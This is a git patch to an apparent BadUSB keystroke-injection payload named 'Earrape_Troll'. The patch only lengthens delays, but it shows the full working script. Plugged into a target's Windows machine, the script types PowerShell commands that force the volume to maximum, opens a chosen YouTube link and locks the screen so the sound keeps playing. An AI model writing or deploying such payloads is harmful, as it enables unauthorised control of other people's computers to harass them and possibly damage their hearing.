From 1bc1be5d5ea16ba2fb75d42ee032db9afbbaf58d Mon Sep 17 00:00:00 2001 From: Gr1mfl3sh <102888542+Gr1mfl3sh@users.noreply.github.com> Date: Wed, 9 Nov 2022 21:40:09 -0500 Subject: [PATCH] Update Earrape_Troll.txt MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Updated delay time 👍 --- BadUSB/Earrape_Troll.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/BadUSB/Earrape_Troll.txt b/BadUSB/Earrape_Troll.txt index df970d0c..5742046e 100644 --- a/BadUSB/Earrape_Troll.txt +++ b/BadUSB/Earrape_Troll.txt @@ -3,17 +3,17 @@ REM Creator: Grim<3 REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link REM For: Win10 (will use default browser) GUI R -DELAY 100 +DELAY 1000 STRING Powershell.exe ENTER -DELAY 500 +DELAY 1000 STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}} ENTER -DELAY 100 +DELAY 2000 STRING Set-Speaker -Volume 50 ENTER -DELAY 100 +DELAY 2000 STRING start YOUR YOUTUBE LINK WITH THE HTTPS:// ENTER -DELAY 100 +DELAY 4000 GUI L